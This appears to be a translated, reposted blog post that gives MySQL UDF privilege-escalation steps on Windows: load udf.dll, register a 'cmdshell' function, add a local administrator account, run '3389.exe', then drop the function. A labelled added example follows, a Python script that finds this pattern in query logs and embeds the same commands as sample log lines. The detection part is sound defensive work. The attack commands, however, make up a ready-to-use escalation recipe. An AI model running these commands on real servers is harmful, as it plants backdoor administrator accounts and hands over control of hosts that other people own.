First, upload the udf.dll file to the Windows directory:
C:\Winnt\udf.dll (Windows 2000)
C:\Windows\udf.dll (Windows 2003)
SQL statements to execute:
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('e:\\3389.exe');
drop function cmdshell; -- delete the function
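The statements above leave a recognizable trail when the MySQL general query log is enabled. The following added example (not part of the original post) scans log lines for a UDF being registered from a shared library, called, and then dropped; the log layout, the sample lines and the function name find_udf_activity are constructed assumptions.

```python
import re

# Constructed sample lines in a general-query-log style layout
# (timestamp, connection id, command, statement); not from a real server.
SAMPLE_LOG = [
    "2024-05-01T10:00:01.000000Z\t   41 Query\tselect * from orders where id = 7",
    "2024-05-01T10:00:05.000000Z\t   42 Query\tcreate function cmdshell returns string soname 'udf.dll'",
    "2024-05-01T10:00:09.000000Z\t   42 Query\tselect cmdshell('net user user password /add')",
    "2024-05-01T10:00:10.000000Z\t   43 Query\tselect cmdshell_notes from wiki",
    "2024-05-01T10:00:12.000000Z\t   42 Query\tdrop function cmdshell",
]

LINE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
CREATE = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+`?(\w+)`?\s+returns\s+\w+\s+soname\s+'([^']+)'",
    re.I,
)
DROP = re.compile(r"drop\s+function\s+(?:if\s+exists\s+)?`?(\w+)`?", re.I)


def find_udf_activity(lines):
    """Return (timestamp, conn_id, event, function, library) tuples."""
    registered = {}  # function name -> library it was loaded from
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a Query entry
        ts, conn, stmt = m.groups()
        created = CREATE.search(stmt)
        if created:
            name, lib = created.group(1).lower(), created.group(2)
            registered[name] = lib
            findings.append((ts, conn, "udf_registered", name, lib))
            continue
        dropped = DROP.search(stmt)
        if dropped:
            name = dropped.group(1).lower()
            if name in registered:
                findings.append((ts, conn, "udf_dropped", name, registered.pop(name)))
            continue
        # Any later statement that calls a registered UDF by name
        for name, lib in registered.items():
            if re.search(r"\b%s\s*\(" % re.escape(name), stmt, re.I):
                findings.append((ts, conn, "udf_called", name, lib))
    return findings
```

On a production server, the same review can start from the rows of the mysql.func table, which lists every UDF currently registered and the library it was loaded from.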
Attachment: http://down.51cto.com/data/2349674
This article is reposted from simeon2005's 51CTO blog; original link: http://blog.51cto.com/simeon/69821